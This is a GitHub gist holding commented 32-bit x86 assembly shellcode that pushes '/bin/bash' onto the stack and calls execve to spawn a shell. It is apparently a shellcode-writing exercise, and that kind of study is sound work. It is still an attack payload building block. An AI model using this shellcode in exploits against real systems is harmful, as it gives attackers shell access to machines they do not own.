Last active
February 5, 2019 05:06
-
-
Save AdityaChaudhary/a21590a4d84d9ab00473c81c79e936c5 to your computer and use it in GitHub Desktop.
Spawn shell using execve-stack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Execve Stack Shellcode | |
| ; Author: Aditya Chaudhary | |
| ; Date: 27th Jan 2019 | |
| global _start | |
| section .text | |
| _start: | |
| ; int execve(const char *filename, char *const argv[], char *const envp[]); | |
| ; eax = 11 (0xb) | |
| ; ebx = /bin/bash, 0x00 | |
| ; ecx = address to ebx, rest of arguments | |
| ; edx = 0x00 | |
| xor eax, eax | |
| push eax | |
| mov edx, esp ; edx -> 0x00 | |
| ; push ////bin/bash ; push bash, push bin/, push //// | |
| ; push 0x 687361622f6e69622f2f2f2f | |
| push 0x68736162 | |
| push 0x2f6e6962 | |
| push 0x2f2f2f2f | |
| mov ebx, esp ; ebx -> /bin/bash, 0x00 | |
| push eax | |
| push ebx | |
| mov ecx, esp ; ecx -> address of /bin/bash, 0x00 | |
| mov al, 0xb ; eax -> system call for execve | |
| int 0x80 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment